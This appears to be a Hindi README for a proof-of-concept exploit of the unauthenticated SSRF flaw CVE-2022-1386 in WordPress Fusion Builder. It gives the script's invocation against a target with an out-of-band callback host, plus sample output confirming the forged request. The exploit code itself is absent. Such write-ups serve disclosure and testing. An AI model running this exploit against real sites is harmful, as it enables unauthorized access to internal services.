
WordPress Fusion Builder <3.6.2 (CVE-2022-1386) में अप्रमाणित SSRF PoC
Fusion Builder प्लगइन (जिसका उपयोग Avada WordPress थीम में होता है) के संस्करण 3.6.2 से पहले बिना प्रमाणीकरण के सर्वर-साइड रिक्वेस्ट फॉरजरी (SSRF) भेद्यता।
यह हमलावरों को मनमाने URLs पर HTTP अनुरोध भेजने की अनुमति देता है, जो संभावित रूप से आंतरिक सेवाओं को लक्षित कर सकता है।
admin-ajax.php पर बिना प्रमाणीकरण के HTTP POSTpython3 exploit_cve_2022_1386.py <target_url> <your_callback_url>
उदाहरण:
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun
कॉलबैक प्राप्त करने के लिए Interact.sh या [Burp Collaborator] का उपयोग करें।
📋 नमूना आउटपुट
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.
📌 नोट्स यह PoC डेटा एक्सफिल्ट्रेशन से बचता है। केवल नैतिक उपयोग: बिना अधिकार के सिस्टम का शोषण न करें।
📚 संदर्भ https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b https://theme-fusion.com/documentation/avada/fusion-builder-changelog/